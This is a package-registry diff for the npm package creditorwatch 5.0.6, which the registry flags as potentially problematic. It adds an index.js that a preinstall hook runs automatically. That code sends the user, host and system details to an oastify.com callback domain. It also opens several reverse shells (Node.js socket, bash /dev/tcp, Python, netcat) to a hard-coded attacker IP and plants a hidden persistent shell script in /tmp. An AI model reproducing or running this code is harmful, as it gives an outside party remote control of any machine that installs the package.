creditorwatch 5.0.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of creditorwatch might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +176 -0
  2. package/package.json +13 -0
package/index.js ADDED
@@ -0,0 +1,176 @@
1
+ const { exec, spawn } = require("child_process");
2
+ const net = require("net");
3
+
4
+ // Your attacker IP and port
5
+ const ATTACKER_IP = "143.110.254.249";
6
+ const ATTACKER_PORT = 1337;
7
+
8
+ // Auto-execution commands once shell connects
9
+ const autoCommands = [
10
+ "echo '=== REVERSE SHELL ESTABLISHED ==='",
11
+ "echo '=== SYSTEM INFORMATION ==='",
12
+ "whoami",
13
+ "id",
14
+ "uname -a",
15
+ "hostname",
16
+ "pwd",
17
+ "echo '=== DIRECTORY LISTING ==='",
18
+ "ls -la",
19
+ "echo '=== NETWORK INFORMATION ==='",
20
+ "ifconfig || ip addr show",
21
+ "echo '=== PROCESS INFORMATION ==='",
22
+ "ps aux | head -10",
23
+ "echo '=== ENVIRONMENT VARIABLES ==='",
24
+ "env | head -10",
25
+ "echo '=== SUDO PRIVILEGES ==='",
26
+ "sudo -l 2>/dev/null || echo 'Cannot check sudo privileges'",
27
+ "echo '=== WRITABLE DIRECTORIES ==='",
28
+ "find / -writable -type d 2>/dev/null | head -10",
29
+ "echo '=== CRON JOBS ==='",
30
+ "crontab -l 2>/dev/null || echo 'No crontab for current user'",
31
+ "echo '=== SHELL READY FOR INTERACTION ==='",
32
+ ""
33
+ ];
34
+
35
+ // Enhanced Node.js native reverse shell with auto-commands
36
+ function nodeReverseShellWithAutoExec() {
37
+ try {
38
+ const client = new net.Socket();
39
+ client.connect(ATTACKER_PORT, ATTACKER_IP, () => {
40
+ console.log('Connected to attacker - executing auto commands');
41
+
42
+ // Spawn a shell
43
+ const shell = spawn('/bin/bash', ['-i']);
44
+
45
+ // Pipe shell output to client
46
+ shell.stdout.pipe(client);
47
+ shell.stderr.pipe(client);
48
+
49
+ // Pipe client input to shell
50
+ client.pipe(shell.stdin);
51
+
52
+ // Execute auto commands immediately upon connection
53
+ setTimeout(() => {
54
+ autoCommands.forEach((cmd, index) => {
55
+ setTimeout(() => {
56
+ shell.stdin.write(cmd + '\n');
57
+ }, index * 1000); // 1 second delay between commands
58
+ });
59
+ }, 1000); // Wait 1 second after connection before starting commands
60
+
61
+ client.on('close', () => {
62
+ shell.kill();
63
+ });
64
+ });
65
+
66
+ client.on('error', (err) => {
67
+ console.error('Connection error:', err.message);
68
+ });
69
+ } catch (error) {
70
+ console.error('Native reverse shell error:', error.message);
71
+ }
72
+ }
73
+
74
+ // Multiple reverse shell payloads with auto-execution
75
+ const reverseShellPayloads = [
76
+ // Bash reverse shell with auto commands
77
+ `bash -c 'exec bash -i &>/dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} <&1; (sleep 2; echo "=== AUTO RECON ==="; whoami; id; uname -a; hostname; pwd; ls -la; echo "=== READY ===") &'`,
78
+
79
+ // Python reverse shell with auto commands
80
+ `python3 -c "
81
+ import socket,subprocess,os,time
82
+ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
83
+ s.connect(('${ATTACKER_IP}',${ATTACKER_PORT}))
84
+ os.dup2(s.fileno(),0)
85
+ os.dup2(s.fileno(),1)
86
+ os.dup2(s.fileno(),2)
87
+ # Send auto commands
88
+ auto_cmds=['whoami','id','uname -a','hostname','pwd','ls -la']
89
+ for cmd in auto_cmds:
90
+ try:
91
+ result=subprocess.check_output(cmd,shell=True,stderr=subprocess.STDOUT)
92
+ s.send(f'AUTO: {cmd}\\n'.encode())
93
+ s.send(result)
94
+ s.send(b'\\n')
95
+ time.sleep(0.5)
96
+ except: pass
97
+ s.send(b'=== SHELL READY ===\\n')
98
+ p=subprocess.call(['/bin/bash','-i'])
99
+ "`,
100
+
101
+ // Netcat with command injection
102
+ `bash -c 'mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | tee /tmp/output | nc ${ATTACKER_IP} ${ATTACKER_PORT} > /tmp/f; (sleep 3; echo "whoami; id; uname -a; hostname; pwd; ls -la" > /tmp/f) &'`
103
+ ];
104
+
105
+ // Your original payloads for initial reconnaissance
106
+ const reconPayloads = [
107
+ `nslookup $(whoami).$(hostname).gau5jjim899y61s6jll79cumyd44svgk.oastify.com`,
108
+ `curl http://gau5jjim899y61s6jll79cumyd44svgk.oastify.com/$(whoami)/$(hostname)/ -A "$(id)"`,
109
+ `curl http://gau5jjim899y61s6jll79cumyd44svgk.oastify.com/rce-established -d "$(uname -a)"`,
110
+ ];
111
+
112
+ // Execute initial reconnaissance
113
+ console.log("Executing initial reconnaissance payloads...");
114
+ reconPayloads.forEach((cmd, index) => {
115
+ setTimeout(() => {
116
+ exec(cmd, (error, stdout, stderr) => {
117
+ if (error) console.error(`Recon error [${index}]:`, error.message);
118
+ if (stderr) console.error(`Recon stderr [${index}]:`, stderr);
119
+ if (stdout) console.log(`Recon stdout [${index}]:`, stdout);
120
+ });
121
+ }, index * 1000);
122
+ });
123
+
124
+ // Try Node.js native reverse shell with auto-execution first
125
+ setTimeout(() => {
126
+ console.log("Attempting Node.js native reverse shell with auto-recon...");
127
+ nodeReverseShellWithAutoExec();
128
+ }, 3000);
129
+
130
+ // Try system-level reverse shells with auto-execution as backup
131
+ setTimeout(() => {
132
+ console.log("Attempting system reverse shells with auto-recon...");
133
+ reverseShellPayloads.forEach((cmd, index) => {
134
+ setTimeout(() => {
135
+ exec(cmd, (error, stdout, stderr) => {
136
+ if (error) console.error(`Shell error [${index}]:`, error.message);
137
+ if (stderr) console.error(`Shell stderr [${index}]:`, stderr);
138
+ if (stdout) console.log(`Shell stdout [${index}]:`, stdout);
139
+ });
140
+ }, index * 3000); // Stagger attempts more
141
+ });
142
+ }, 8000);
143
+
144
+ // Alternative: Simple reverse shell with immediate command execution
145
+ const quickReconShell = `bash -c '(sleep 1; echo "=== QUICK RECON ==="; whoami; id; uname -a; hostname; pwd; ls -la; echo "=== END RECON ===") | nc ${ATTACKER_IP} ${ATTACKER_PORT}'`;
146
+
147
+ setTimeout(() => {
148
+ console.log("Attempting quick recon shell...");
149
+ exec(quickReconShell, (error, stdout, stderr) => {
150
+ if (error) console.error("Quick recon error:", error.message);
151
+ if (stderr) console.error("Quick recon stderr:", stderr);
152
+ if (stdout) console.log("Quick recon stdout:", stdout);
153
+ });
154
+ }, 15000);
155
+
156
+ // Persistence with auto-recon (for impact demonstration)
157
+ const persistentShellWithRecon = `
158
+ echo '#!/bin/bash
159
+ echo "=== PERSISTENT SHELL ACTIVATED ==="
160
+ whoami
161
+ id
162
+ uname -a
163
+ hostname
164
+ pwd
165
+ bash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1
166
+ ' > /tmp/.autoshell.sh && chmod +x /tmp/.autoshell.sh && /tmp/.autoshell.sh &
167
+ `;
168
+
169
+ setTimeout(() => {
170
+ console.log("Setting up persistent shell with auto-recon...");
171
+ exec(persistentShellWithRecon, (error, stdout, stderr) => {
172
+ if (error) console.error("Persistent shell error:", error.message);
173
+ if (stderr) console.error("Persistent shell stderr:", stderr);
174
+ if (stdout) console.log("Persistent shell stdout:", stdout);
175
+ });
176
+ }, 20000);
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "creditorwatch",
3
+ "version": "5.0.6",
4
+ "description": "This is a PoC for RCE",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "Shehzad Secure Purple",
11
+ "license": "ISC",
12
+ "dependencies": {}
13
+ }